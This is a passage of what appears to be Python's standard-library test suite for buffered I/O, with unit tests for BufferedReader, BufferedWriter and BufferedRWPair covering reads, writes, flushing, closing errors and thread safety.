b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
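# The reported size of two buffered objects should differ only by the size of the buffers they allocate.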
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
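# The mock raw object counts its read() calls in _reads, which lets us verify that read1() performs at most one raw read per call.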
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
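# Each entry is [buffer_size, sizes of buffered reads, expected raw read sizes].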
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason="sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes; test that the flushed output is as expected.
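# intermediate_func is called between writes to interleave flushes, seeks, reads, etc.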
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are set to 0
f.read(1)
# The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason="sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
